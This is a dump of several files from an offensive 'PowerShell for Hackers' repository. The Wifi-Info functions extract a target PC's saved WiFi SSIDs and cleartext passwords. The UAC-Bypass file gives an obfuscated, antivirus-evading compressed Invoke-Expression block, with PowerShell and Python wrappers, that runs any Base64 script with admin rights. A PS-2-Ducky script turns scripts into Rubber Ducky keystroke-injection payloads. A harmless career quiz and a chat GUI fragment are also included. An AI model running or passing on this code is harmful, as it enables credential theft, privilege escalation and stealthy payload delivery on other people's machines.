Anchor to bottom left 84 | $form.Controls.Add($textBoxIP) 85 | 86 | $labelPort = New-Object System.Windows.Forms.Label 87 | $labelPort.Location = New-Object System.Drawing.Point(10, 380) 88 | $labelPort.Size 
= New-Object System.Drawing.Size(100, 20) 89 | $labelPort.Text = "Target Port:" 90 | $labelPort.ForeColor = [System.Drawing.Color]::White 91 | $labelPort.Anchor = 'Bottom,Left' # Anchor to bottom left 92 | $form.Controls.Add($labelPort) 93 | 94 | $textBoxPort = New-Object System.Windows.Forms.TextBox 95 | $textBoxPort.Location = New-Object System.Drawing.Point(120, 380) 96 | $textBoxPort.Size = New-Object System.Drawing.Size(150, 20) 97 | $textBoxPort.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 98 | $textBoxPort.ForeColor = [System.Drawing.Color]::WhiteSmoke 99 | $textBoxPort.Anchor = 'Bottom,Left' # Anchor to bottom left 100 | $form.Controls.Add($textBoxPort) 101 | 102 | 103 | # Modify the Send button's click event 104 | $buttonSend.Add_Click({ 105 | $message = $textBoxInput.Text 106 | $targetIP = $textBoxIP.Text 107 | $targetPort = $textBoxPort.Text 108 | 109 | if ($message -ne "" -and $targetIP -ne "" -and $targetPort -ne "") { 110 | Send-TcpMessage -TargetIP $targetIP -TargetPort $targetPort -Message $message 111 | $richTextBoxDisplay.AppendText("You: $message`r`n") 112 | $textBoxInput.Clear() 113 | $richTextBoxDisplay.ScrollToCaret() 114 | } else { 115 | [System.Windows.Forms.MessageBox]::Show("Please fill all fields", "Error", [System.Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Error) 116 | } 117 | }) 118 | 119 | # Create a StatusStrip for the bottom of the form 120 | $statusStrip = New-Object System.Windows.Forms.StatusStrip 121 | $statusStrip.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 122 | $statusLabel1 = New-Object System.Windows.Forms.ToolStripStatusLabel 123 | $statusLabel1.Text = "Status: " 124 | $statusLabel1.ForeColor = [System.Drawing.Color]::White 125 | $statusLabel2 = New-Object System.Windows.Forms.ToolStripStatusLabel 126 | $statusLabel2.Text = "Disconnected" # Default status 127 | $statusLabel2.ForeColor = [System.Drawing.Color]::Red 128 | $statusStrip.Items.Add($statusLabel1) 129 | 
$statusStrip.Items.Add($statusLabel2) 130 | $form.Controls.Add($statusStrip) 131 | 132 | # Show the form 133 | $form.ShowDialog() 134 | ``` 135 | -------------------------------------------------------------------------------- /Functions/Wifi-Info.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Wifi-Info 16 | 17 |


23 | 24 | ## Description 25 | 26 | These functions will help you enumerate your targets wifi, and the wifi nearby 27 | 28 | ## The Function 29 | 30 | ### [Nearby Networks] 31 | 32 | This quick snippet will get you the wifi connections visible from your targets PC 33 | 34 | ``` 35 | $NearbyNetworks = (netsh wlan show networks mode=Bssid | ?{$_ -like "SSID*" -or $_ -like "*Authentication*" -or $_ -like "*Encryption*"}).trim() 36 | ``` 37 | 38 | ### [Get-CurrentNetwork] 39 | 40 | This first function will get you the SSID and Password the target PC is currently connected to and save it to the variable $CurrentNetwork 41 | 42 | ``` 43 | function Get-CurrentNetwork { 44 | 45 | $pro = netsh wlan show interface | Select-String -Pattern ' SSID '; $pro = [string]$pro;$pos = $pro.IndexOf(':');$pro = $pro.Substring($pos+2).Trim() 46 | 47 | $pass = netsh wlan show profile $pro key=clear | Select-String -Pattern 'Key Content'; $pass = [string]$pass;$passPOS = $pass.IndexOf(':');$pass = $pass.Substring($passPOS+2).Trim() 48 | 49 | return "$pro : $pass" 50 | 51 | } 52 | 53 | $CurrentNetwork = Get-CurrentNetwork 54 | 55 | ``` 56 | 57 | ### [Get-AllNetworks] 58 | 59 | This function will get you a list of all the wifi networks your target has joined and their passwords and save it to the variable $Networks 60 | 61 | ``` 62 | Function Get-Networks { 63 | # Get Network Interfaces 64 | $Network = Get-WmiObject Win32_NetworkAdapterConfiguration | where { $_.MACAddress -notlike $null } | select Index, Description, IPAddress, DefaultIPGateway, MACAddress | Format-Table Index, Description, IPAddress, DefaultIPGateway, MACAddress 65 | 66 | # Get Wifi SSIDs and Passwords 67 | $WLANProfileNames =@() 68 | 69 | #Get all the WLAN profile names 70 | $Output = netsh.exe wlan show profiles | Select-String -pattern " : " 71 | 72 | #Trim the output to receive only the name 73 | Foreach($WLANProfileName in $Output){ 74 | $WLANProfileNames += (($WLANProfileName -split ":")[1]).Trim() 75 | } 76 | 
$WLANProfileObjects =@() 77 | 78 | #Bind the WLAN profile names and also the password to a custom object 79 | Foreach($WLANProfileName in $WLANProfileNames){ 80 | 81 | #get the output for the specified profile name and trim the output to receive the password if there is no password it will inform the user 82 | try{ 83 | $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() 84 | }Catch{ 85 | $WLANProfilePassword = "The password is not stored in this profile" 86 | } 87 | 88 | #Build the object and add this to an array 89 | $WLANProfileObject = New-Object PSCustomobject 90 | $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfileName" -Value $WLANProfileName 91 | $WLANProfileObject | Add-Member -Type NoteProperty -Name "ProfilePassword" -Value $WLANProfilePassword 92 | $WLANProfileObjects += $WLANProfileObject 93 | Remove-Variable WLANProfileObject 94 | } 95 | return $WLANProfileObjects 96 | } 97 | 98 | $Networks = Get-Networks 99 | ``` 100 | 101 |


102 | 103 | 104 | ## Examples 105 | [//]: # (Examples of scripts that have used your function) 106 | Listed below are payloads that have used one of these functions: 107 | 108 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 109 | 110 | [ADV-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 111 | 112 | 113 |


114 | 115 | 116 | ## Contact 117 | 118 |


153 | 154 | 155 | ## Acknowledgments 156 | 157 | * [Hak5](https://hak5.org/) 158 | * [UberGuidoZ](https://github.com/UberGuidoZ) 159 | 160 | *** 161 | 162 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 163 | 164 |


165 | -------------------------------------------------------------------------------- /Functions/UAC-Bypass.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
13 | 14 | # UAC Bypass 15 | 16 |


22 | 23 | ## Description 24 | 25 | This is a bonus function I am including with this repository. It will allow you to run any Base64-encoded script from a standard PowerShell console regardless 26 | of whether Admin privileges are required. It will open an Admin prompt and execute your code, bypassing the UAC. In order to get this past the antivirus I had to heavily 27 | obfuscate it. Because of that obfuscation you cannot tell what the block does just by reading it, and you really should not run code if you do not know what it does, so user discretion is advised. 28 | 29 | ## The Function 30 | 31 | ### [UAC-Bypass] 32 | 33 | This function has 2 parts. 34 | 35 | You have the ```$code``` variable, into which you can store any Base64-encoded script. 36 | 37 | You can use my [Text to Base64](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers/blob/main/Functions/B64.md) function to encode your own scripts. 38 | 39 | ``` 40 | $code = "TgBlAHcALQBJAHQAZQBtACAAQwA6AFwASQB0AC0AVwBvAHIAawBlAGQALgB0AHgAdAA=" 41 | ``` 42 | Next you have a highly obfuscated block of code that will run any Base64-encoded script stored in the ```$code``` variable with Admin rights. 43 | 44 | Using the code above as an example, running both of these in a standard non-Admin PowerShell console will create a file called ```It-Worked.txt``` 45 | 46 | in your C: directory, just to show you it works. 47 | 48 | ``` 49 | (nEw-OBJECt Io.CoMpreSsion.DEflateSTrEaM( [SyStem.io.memoRYSTReaM][convErT]::fromBaSE64STriNg( 'hY49C8IwGIT/ykvoGjs4FheLqIgfUHTKEpprK+SLJFL99zYFwUmXm+6ee4rzcbti3o0IcYDWCzxBfKSB+Mldctg98c0TLa1fXsZIHLalonUKxKqAnqRSxHaH+ioa16VRBohaT01EsXCmF03mirOHFa0zRlrFqFRUTM9Udv8QJvKIlO62j6J+hBvCvGYZzfK+c2o68AhZvWqSDIk3GvDEIy1nvIJGwk9J9lH53f22mSdv') ,[SysTEM.io.COMpResSion.coMPRESSIONMoDE]::DeCompress ) | ForeacH{nEw-OBJECt Io.StReaMrEaDer( $_,[SySTEM.teXT.enCOdING]::aSciI )}).rEaDTOEnd( ) | InVoKE-expREssION 50 | ``` 51 | 52 | I have turned this bypass into a function as well.
53 | 54 | Using the following syntax you can run any Base64 encoded script as an Admin: 55 | 56 | ``` 57 | Bypass TgBlAHcALQBJAHQAZQBtACAAQwA6AFwASQB0AC0AVwBvAHIAawBlAGQALgB0AHgAdAA= 58 | ``` 59 | 60 | ``` 61 | function Bypass { 62 | [CmdletBinding()] 63 | param ( 64 | [Parameter (Position=0, Mandatory = $True)] 65 | [string]$code ) 66 | 67 | (nEw-OBJECt Io.CoMpreSsion.DEflateSTrEaM( [SyStem.io.memoRYSTReaM][convErT]::fromBaSE64STriNg( 'hY49C8IwGIT/ykvoGjs4FheLqIgfUHTKEpprK+SLJFL99zYFwUmXm+6ee4rzcbti3o0IcYDWCzxBfKSB+Mldctg98c0TLa1fXsZIHLalonUKxKqAnqRSxHaH+ioa16VRBohaT01EsXCmF03mirOHFa0zRlrFqFRUTM9Udv8QJvKIlO62j6J+hBvCvGYZzfK+c2o68AhZvWqSDIk3GvDEIy1nvIJGwk9J9lH53f22mSdv') ,[SysTEM.io.COMpResSion.coMPRESSIONMoDE]::DeCompress ) | ForeacH{nEw-OBJECt Io.StReaMrEaDer( $_,[SySTEM.teXT.enCOdING]::aSciI )}).rEaDTOEnd( ) | InVoKE-expREssION 68 | } 69 | ``` 70 | 71 | Even though this is a Powershell for Hackers Repository I have it made up and ready to use for python as well. Enjoy 72 | 73 | ``` 74 | import base64 75 | import subprocess 76 | plain_command = "New-Item C:\it-worked.txt" 77 | code = bytearray(plain_command, 'utf-16-le');code = base64.b64encode(code).decode() 78 | setVar = "Set-Variable -Name 'code' -Value "+f'"{code}";' 79 | final_command = r"(nEw-OBJECt Io.CoMpreSsion.DEflateSTrEaM( [SyStem.io.memoRYSTReaM][convErT]::fromBaSE64STriNg( 'hY49C8IwGIT/ykvoGjs4FheLqIgfUHTKEpprK+SLJFL99zYFwUmXm+6ee4rzcbti3o0IcYDWCzxBfKSB+Mldctg98c0TLa1fXsZIHLalonUKxKqAnqRSxHaH+ioa16VRBohaT01EsXCmF03mirOHFa0zRlrFqFRUTM9Udv8QJvKIlO62j6J+hBvCvGYZzfK+c2o68AhZvWqSDIk3GvDEIy1nvIJGwk9J9lH53f22mSdv') ,[SysTEM.io.COMpResSion.coMPRESSIONMoDE]::DeCompress ) | ForeacH{nEw-OBJECt Io.StReaMrEaDer( $_,[SySTEM.teXT.enCOdING]::aSciI )}).rEaDTOEnd( ) | InVoKE-expREssION" 80 | subprocess.run(["powershell",setVar,final_command]) 81 | ``` 82 | 83 |


84 | 85 | 86 | 87 | ## Contact 88 | 89 |


123 | 124 | 125 | ## Acknowledgments 126 | 127 | * [Hak5](https://hak5.org/) 128 | * [UberGuidoZ](https://github.com/UberGuidoZ) 129 | 130 | *** 131 | 132 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 133 | 134 |


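--------------------------------------------------------------------------------
/VideoNotes/Where-To-Start/quiz.ps1:
--------------------------------------------------------------------------------
function hackerQuiz {
    <#
    .SYNOPSIS
    Asks a series of Yes/No questions and prints the security role that collected the most points.

    .DESCRIPTION
    Every question is shown in a Windows Forms message box with Yes and No buttons.
    A "Yes" answer adds one point to each role listed under that question's 'Y' key.
    The role with the highest score is then described on the console. When several
    roles share the top score, the one that received its first point earliest wins.

    .NOTES
    Takes no parameters and returns nothing; all output goes through Write-Host.
    The 'Bug Bounty Hunter' result additionally opens a GitHub page with Start-Process.
    #>

    # Each entry pairs a question with the roles that earn one point on a "Yes" answer.
    $questions = @(
        @{
            'Question' = "Are you interested in finding and exploiting vulnerabilities in software or web applications?"
            'Scores' = @{
                'Y' = @('Bug Bounty Hunter', 'Penetration Tester')
            }
        },
        @{
            'Question' = "Do you enjoy reverse engineering software or binary files?"
            'Scores' = @{
                'Y' = @('Malware Analyst', 'Security Researcher')
            }
        },
        @{
            'Question' = "Are you interested in developing scripts or tools for offensive security purposes?"
            'Scores' = @{
                'Y' = @('Payload Developer', 'Penetration Tester')
            }
        },
        @{
            'Question' = "Are you intrigued by cryptography and secure communication systems?"
            'Scores' = @{
                'Y' = @('Cryptographer', 'Security Researcher')
            }
        },
        @{
            'Question' = "Do you enjoy analyzing network traffic for suspicious activities?"
            'Scores' = @{
                'Y' = @('Network Security Engineer', 'Forensic Analyst')
            }
        },
        @{
            'Question' = "Do you have an eye for detail and enjoy reviewing code for potential security flaws?"
            'Scores' = @{
                'Y' = @('Security Auditor', 'Bug Bounty Hunter')
            }
        },
        @{
            'Question' = "Do you enjoy identifying, assessing, and managing risk?"
            'Scores' = @{
                'Y' = @('Security Auditor', 'Cyber Security Consultant')
            }
        },
        @{
            'Question' = "Are you interested in providing guidance on how to protect digital infrastructure?"
            'Scores' = @{
                'Y' = @('Cyber Security Consultant', 'Network Security Engineer')
            }
        },
        @{
            'Question' = "Are you fascinated by malicious software and their mechanisms?"
            'Scores' = @{
                'Y' = @('Malware Analyst', 'Forensic Analyst')
            }
        },
        @{
            'Question' = "Do you like the idea of trying to break into systems legally to find vulnerabilities?"
            'Scores' = @{
                'Y' = @('Penetration Tester', 'Bug Bounty Hunter')
            }
        },
        @{
            'Question' = "Are you drawn to the idea of developing defensive mechanisms against cyber attacks?"
            'Scores' = @{
                'Y' = @('Network Security Engineer', 'Security Architect')
            }
        },
        @{
            'Question' = "Are you interested in keeping up-to-date with the latest cybersecurity trends and threat landscape?"
            'Scores' = @{
                'Y' = @('Security Analyst', 'Threat Intelligence Analyst')
            }
        },
        @{
            'Question' = "Do you enjoy the legal and ethical aspects of information security?"
            'Scores' = @{
                'Y' = @('Cybersecurity Lawyer', 'Security Compliance Officer')
            }
        },
        @{
            'Question' = "Are you interested in designing and building secure systems?"
            'Scores' = @{
                'Y' = @('Security Architect', 'Penetration Tester')
            }
        },
        @{
            'Question' = "Would you like to help organizations prepare for and respond to security breaches?"
            'Scores' = @{
                'Y' = @('Incident Responder', 'Forensic Analyst')
            }
        },
        @{
            'Question' = "Are you keen on learning about different operating systems and their security features?"
            'Scores' = @{
                'Y' = @('Security Auditor', 'Penetration Tester')
            }
        }
    )

    # Scores are created on first use. $roleOrder records the order in which roles received
    # their first point, because the key order of a plain hashtable is not guaranteed and
    # would make tie-breaking differ between runs.
    $roles = @{}
    $roleOrder = @()

    Add-Type -AssemblyName System.Windows.Forms
    foreach ($question in $questions) {
        $msgBoxResult = [System.Windows.Forms.MessageBox]::Show($question['Question'], "Question", [System.Windows.Forms.MessageBoxButtons]::YesNo)
        Clear-Host
        if ($msgBoxResult -eq 'Yes') {
            foreach ($role in $question['Scores']['Y']) {
                if (!$roles.ContainsKey($role)) {
                    $roles[$role] = 0
                    $roleOrder += $role
                }
                $roles[$role] += 1
            }
        }
    }

    # Pick the highest-scoring role; -gt keeps the earliest role on a tie.
    $maxScore = 0
    $chosenRole = $null
    foreach ($role in $roleOrder) {
        if ($roles[$role] -gt $maxScore) {
            $maxScore = $roles[$role]
            $chosenRole = $role
        }
    }

    Clear-Host

    # Every answer was "No": there is nothing to suggest.
    if ($null -eq $chosenRole) {
        Write-Host "No role could be suggested because no question was answered with Yes."
        return
    }

    # Describe the suggested role
    switch ($chosenRole) {
        'Bug Bounty Hunter' {
            Write-Host "As a Bug Bounty Hunter, you'll find vulnerabilities in systems and earn rewards!"
            # Opens this GitHub page through Start-Process in addition to printing the description.
            Start-Process https://github.com/I-Am-Jakoby/Youtube_Minus
        }
        'Malware Analyst' {
            Write-Host "As a Malware Analyst, you'll reverse-engineer malicious software to understand it!"
        }
        'Payload Developer' {
            Write-Host "As a Payload Developer, you'll craft scripts and tools to exploit vulnerabilities!"
        }
        'Penetration Tester' {
            Write-Host "As a Penetration Tester, you'll attempt to breach systems to find their weaknesses!"
        }
        'Security Researcher' {
            Write-Host "As a Security Researcher, you'll explore new methods and techniques for securing systems!"
        }
        'Cryptographer' {
            Write-Host "As a Cryptographer, you'll design secure encryption algorithms and systems!"
        }
        'Forensic Analyst' {
            Write-Host "As a Forensic Analyst, you'll investigate breaches and incidents to discover what happened!"
        }
        'Security Auditor' {
            Write-Host "As a Security Auditor, you'll inspect systems to ensure they comply with security standards!"
        }
        'Cyber Security Consultant' {
            Write-Host "As a Cyber Security Consultant, you'll provide guidance to organizations on how to secure their digital infrastructure!"
        }
        'Network Security Engineer' {
            Write-Host "As a Network Security Engineer, you'll design and maintain secure networks!"
        }
        default {
            # Several questions award points to roles that have no description above
            # (for example 'Security Architect' or 'Incident Responder'); name the role
            # instead of reporting it as unrecognized.
            Write-Host "Your answers point to the role '$chosenRole'."
        }
    }

}

hackerQuiz
# v.2
--------------------------------------------------------------------------------
/Assets/Scripts/P-2-Ducky.ps1:
--------------------------------------------------------------------------------
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Ducky-Base64-Exec | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Execute | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.)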
)# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################

<#
.SYNOPSIS
	This is a PowerShell cmdlet that converts a script to Base64 and then formats it into a DuckyScript-ready payload

.DESCRIPTION
	This cmdlet takes a file path and converts the contents of that file to a Base64 string
	That Base64 string is then formatted into DuckyScript ready to be used with the OMG devices or Rubber Ducky
	The output of that conversion is saved to the desktop by default
	The estimated time to execute the script is calculated and written at the top of the output file
	The name of the file is "converted.txt" by default
	The output is appended to the file, so an existing file with the same name is not overwritten

.PARAMETER Source
	(Mandatory = $True)
	Provide the exact path to the file to be converted

.PARAMETER Path
	(Mandatory = $False)
	Provide the exact path to the folder where the output file will be saved

.PARAMETER File
	(Mandatory = $False)
	Provide the name of the output file, without the ".txt" extension

.PARAMETER Delay
	(Mandatory = $False)
	Provide a custom delay between commands; 250 is used when omitted

.PARAMETER Title
	(Mandatory = $False)
	Provide the name of the payload

.PARAMETER Author
	(Mandatory = $False)
	Provide the name of the author

.PARAMETER Description
	(Mandatory = $False)
	Provide a brief description

.EXAMPLE
	PS-2-Ducky -source "C:\Users\USER\Desktop\script.ps1" -Path "C:\Users\User\Desktop" -File example -Title Super-Payload -Author Jakoby -Description "Does cool stuff"
	PS-2-Ducky -s "C:\Users\USER\Desktop\script.ps1" -p "C:\Users\User\Desktop" -f example -t Super-Payload -a Jakoby -d "Does cool stuff"
	"C:\Users\USER\Desktop\script.ps1" | PS-2-Ducky -p "C:\Users\User\Desktop" -f example -t Super-Payload -a Jakoby -d "Does cool stuff"

#>

function PS-2-Ducky {
	[CmdletBinding()]
	param (

	[Parameter (Mandatory = $True, ValueFromPipeline = $True)]
	[Alias("s")]
	[string]$Source,

	[Parameter (Mandatory = $False)]
	[Alias("p")]
	[string]$Path,

	[Parameter (Mandatory = $False)]
	[Alias("f")]
	[string]$File,

	[Parameter (Mandatory = $False)]
	[Alias("de")]
	[string]$Delay,

	[Parameter (Mandatory = $False)]
	[Alias("t")]
	[string]$Title,

	[Parameter (Mandatory = $False)]
	[Alias("a")]
	[string]$Author,

	[Parameter (Mandatory = $False)]
	[Alias("d")]
	[string]$Description

	)

	# Defaults for the optional parameters: file name "converted", the current user's
	# Desktop folder, and 250 as the DELAY value.
	if (!$File) { $File = "converted" }

	if (!$Path) { $Path = [Environment]::GetFolderPath("Desktop") }

	if (!$Delay) { $Delay = 250 }

	# The output file is always <Path>\<File>.txt
	$FilePath = ($Path+"\"+$File+".txt")

	# Read the source file as one UTF-8 string and Base64-encode its UTF-16LE bytes
	# ([System.Text.Encoding]::Unicode).
	$converted = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((Get-Content -Path $Source -Raw -Encoding UTF8)))

	# Estimate written into the first REM line: Base64 length divided by 140, rounded to 2 decimals.
	# NOTE(review): 140 is presumably the assumed typing rate in characters per second - confirm.
	$numChar = $converted.length
	$Time = $numChar/140
	$estTime = [math]::Round($Time,2)

	# NOTE(review): $incriment is not assigned anywhere in this file and $lSplit is never read
	# again, so this helper does not change what is written below; the assignment to $converted
	# inside it presumably stays local to the helper - confirm before relying on it.
	function splitLines{
		While ($converted)
		{
			$x,$converted = ([char[]]$converted).where({$_},'Split',$incriment)
			$x -join ''
		}
	}

	$lSplit = splitLines

	# Everything below is appended with >>, so a second run against the same $FilePath
	# adds another copy after the first instead of replacing it.
	echo "REM --> $numChar Characters: Estimated $estTime seconds to execute `n" >> $FilePath

	# Optional REM header lines, written only for the values that were supplied.
	if ($Title) { echo "REM Title: $Title" >> $FilePath}
	if ($Author) { echo "REM Author: $Author" >> $FilePath}
	if ($Description) { echo "REM Description: $Description" >> $FilePath}

	# Keystroke sequence: GUI r, the string "powershell", ENTER, then "powershell -enc "
	# followed by the Base64 text and ENTER, with a DELAY line between the steps.
	# The Base64 text is passed on a command line that starts with "powershell -enc", which is
	# the string to look for in process command-line logs when hunting for this pattern.
	echo "" >> $FilePath
	echo "GUI r" >> $FilePath
	echo "DELAY $Delay" >> $FilePath
	echo "STRING powershell" >> $FilePath
	echo "DELAY $Delay" >> $FilePath
	echo "ENTER" >> $FilePath
	echo "DELAY $Delay" >> $FilePath
	echo "STRING powershell -enc " >> $FilePath
	echo "DELAY $Delay" >> $FilePath

	# The whole Base64 string is written as a single STRING line.
	echo "STRING $converted" >> $FilePath

	echo "DELAY $Delay" >> $FilePath
	echo "ENTER" >> $FilePath
}

--------------------------------------------------------------------------------